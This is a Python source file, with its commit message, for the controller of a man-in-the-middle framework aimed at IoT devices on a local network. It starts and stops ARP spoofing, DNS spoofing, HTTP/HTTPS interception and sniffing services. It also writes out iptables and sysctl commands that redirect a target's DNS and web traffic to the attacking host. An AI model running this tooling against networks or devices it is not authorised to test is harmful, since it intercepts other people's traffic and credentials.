Files
setec-mitm/mitm.py
sssnake 20e7eb343d Initial commit — SetecMITM generic IoT MITM framework
Templated from cam-mitm. The camera-specific code (UBox cloud client,
CVE verifiers, OAM HMAC signing, fuzzer wordlists) is removed; what's
left is the generic core: ARP spoof, DNS spoof, HTTP/HTTPS interception
with peek-before-wrap, raw sniffer with conntrack-based original-dst
lookup, protocol fingerprinting, intruder detection, packet injection,
log rotation, PyQt6 GUI on top of a service Controller.

All 'camera' references renamed to 'target' throughout. Configuration
moved into ~/.config/setec-mitm/config.json with the Settings tab as
the primary editor. Plugin system at targets/<name>/plugin.py for
vendor-specific code.

See README.md for full setup, plugin authoring, and troubleshooting.

Co-authored by Setec Labs.
2026-04-09 08:38:59 -07:00

224 lines
8.1 KiB
Python
Executable File

#!/usr/bin/env python3
"""
SetecMITM — generic IoT / cloud-device MITM framework.
Drop-in framework for ARP spoofing, DNS hijacking, HTTP/HTTPS interception,
UDP capture, raw sniffer, intruder detection, and packet injection against
any device on the LAN. Target-specific logic (vendor cloud clients, CVE
verifiers, fuzzer wordlists) lives in `targets/<name>/` plugins.
Run with:
sudo /usr/bin/python3 mitm.py
or via the PyQt6 GUI:
sudo /usr/bin/python3 gui.py
"""
import os
import sys
import signal
import threading
import time
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from config import Config
from utils.log import (
log, log_lines, init_logfile, close_logfile, lock,
C_NONE, C_ERROR, C_SUCCESS, C_INFO, C_TRAFFIC, C_IMPORTANT,
)
from services import (
arp_spoof, dns_spoof, http_server, udp_listener, sniffer, intruder_watch,
)
from inject import packet
SERVICE_DEFS = [
# (name, runner_factory)
("arp", lambda cfg, flags, ck: arp_spoof.run(cfg, flags, ck)),
("dns", lambda cfg, flags, ck: dns_spoof.run(cfg, flags, ck)),
("http", lambda cfg, flags, ck: http_server.run_http(cfg, flags, ck)),
("https", lambda cfg, flags, ck: http_server.run_https(cfg, flags, ck)),
("sniffer", lambda cfg, flags, ck: sniffer.run(cfg, flags, ck)),
("intruder", lambda cfg, flags, ck: intruder_watch.run(cfg, flags, ck)),
]
SERVICE_NAMES = [s[0] for s in SERVICE_DEFS]
SERVICE_BY_NAME = {s[0]: s for s in SERVICE_DEFS}
class Controller:
"""
Service supervisor. Owns the iptables redirect rules, per-service
on/off state, and the loaded target plugin (if any).
"""
def __init__(self):
self.cfg = Config()
self.flags = {}
self.running = True
self.services_running = False
self._svc_running = {n: False for n in SERVICE_NAMES}
self._iptables_up = False
self.plugin = None
self._load_plugin()
# ─── plugin loader ────────────────────────────────────
def _load_plugin(self):
name = self.cfg.get("target_plugin", "")
if not name:
return
try:
mod = __import__(f"targets.{name}.plugin", fromlist=["Plugin"])
self.plugin = mod.Plugin(self.cfg)
log(f"plugin loaded: {name}", C_SUCCESS)
except Exception as e:
log(f"plugin load failed ({name}): {e}", C_ERROR)
# ─── iptables ─────────────────────────────────────────
def _ensure_iptables(self):
if self._iptables_up:
return
if not self.cfg["target_ip"] or not self.cfg["our_ip"]:
log("iptables: target_ip and our_ip must be set", C_ERROR)
return
os.system("pkill -f arpspoof 2>/dev/null")
os.makedirs(self.cfg["log_dir"], exist_ok=True)
self._setup_iptables()
self._iptables_up = True
def _setup_iptables(self):
tgt = self.cfg["target_ip"]
us = self.cfg["our_ip"]
cmds = [
"sysctl -w net.ipv4.ip_forward=1",
"iptables -A OUTPUT -p icmp --icmp-type redirect -j DROP",
f"iptables -t nat -A PREROUTING -s {tgt} -p udp --dport 53 -j DNAT --to-destination {us}:53",
f"iptables -t nat -A PREROUTING -s {tgt} -p tcp --dport 80 -j DNAT --to-destination {us}:80",
f"iptables -t nat -A PREROUTING -s {tgt} -p tcp --dport 443 -j DNAT --to-destination {us}:443",
]
for c in cmds:
os.system(c + " >/dev/null 2>&1")
log("iptables rules applied", C_INFO)
def _cleanup_iptables(self):
tgt = self.cfg["target_ip"]
us = self.cfg["our_ip"]
cmds = [
"iptables -D OUTPUT -p icmp --icmp-type redirect -j DROP",
f"iptables -t nat -D PREROUTING -s {tgt} -p udp --dport 53 -j DNAT --to-destination {us}:53",
f"iptables -t nat -D PREROUTING -s {tgt} -p tcp --dport 80 -j DNAT --to-destination {us}:80",
f"iptables -t nat -D PREROUTING -s {tgt} -p tcp --dport 443 -j DNAT --to-destination {us}:443",
]
for c in cmds:
os.system(c + " >/dev/null 2>&1")
# ─── per-service control ──────────────────────────────
def start_service(self, name):
if name not in SERVICE_BY_NAME:
log(f"unknown service: {name}", C_ERROR)
return
if self._svc_running.get(name):
log(f"{name} already running", C_ERROR)
return
self._ensure_iptables()
if name == "http": os.system("fuser -k 80/tcp 2>/dev/null")
elif name == "https": os.system("fuser -k 443/tcp 2>/dev/null")
elif name == "dns": os.system("fuser -k 53/udp 2>/dev/null")
time.sleep(0.2)
self._svc_running[name] = True
check = lambda n=name: self.running and self._svc_running.get(n, False)
runner = SERVICE_BY_NAME[name][1]
threading.Thread(
target=lambda: runner(self.cfg, self.flags, check),
daemon=True, name=f"svc-{name}",
).start()
self.services_running = any(self._svc_running.values())
log(f"started: {name}", C_SUCCESS)
def stop_service(self, name):
if not self._svc_running.get(name):
log(f"{name} not running", C_ERROR)
return
self._svc_running[name] = False
log(f"stopping: {name}", C_INFO)
if name == "http": os.system("fuser -k 80/tcp 2>/dev/null")
elif name == "https": os.system("fuser -k 443/tcp 2>/dev/null")
elif name == "dns": os.system("fuser -k 53/udp 2>/dev/null")
time.sleep(0.5)
self.flags[name] = False
self.services_running = any(self._svc_running.values())
def toggle_service(self, name):
if self._svc_running.get(name):
self.stop_service(name)
else:
self.start_service(name)
def start_services(self):
if self.services_running:
log("services already running", C_ERROR)
return
self._ensure_iptables()
# Honour auto_* config flags
for name in SERVICE_NAMES:
key = f"auto_{name}"
if self.cfg.get(key, True):
self.start_service(name)
time.sleep(0.3)
# Optional UDP listeners
for port in self.cfg.get("auto_udp_ports", []) or []:
threading.Thread(
target=lambda p=port: udp_listener.run(p, self.cfg, self.flags,
lambda: self.running and self.services_running),
daemon=True, name=f"svc-udp{port}",
).start()
time.sleep(0.2)
log("all services started", C_SUCCESS)
def stop_services(self):
if not self.services_running:
log("services not running", C_ERROR)
return
log("stopping all services…", C_INFO)
for name in SERVICE_NAMES:
if self._svc_running.get(name):
self.stop_service(name)
time.sleep(1)
self._cleanup_iptables()
self._iptables_up = False
self.flags.clear()
self.services_running = False
log("services stopped", C_INFO)
def inject_packet(self, params):
return packet.inject(self.cfg, params)
def main():
if os.geteuid() != 0:
print("Run with: sudo /usr/bin/python3 mitm.py")
sys.exit(1)
ctrl = Controller()
init_logfile(f"{ctrl.cfg['log_dir']}/setec_mitm.log")
# Headless mode — start everything and wait. The full curses TUI from
# cam-mitm is not bundled here; use gui.py instead.
log("setec-mitm headless mode. Use gui.py for the full UI.", C_INFO)
ctrl.start_services()
def shutdown(*_):
log("shutting down…", C_INFO)
ctrl.stop_services()
ctrl.running = False
close_logfile()
sys.exit(0)
signal.signal(signal.SIGINT, shutdown)
signal.signal(signal.SIGTERM, shutdown)
while ctrl.running:
time.sleep(0.5)
if __name__ == "__main__":
main()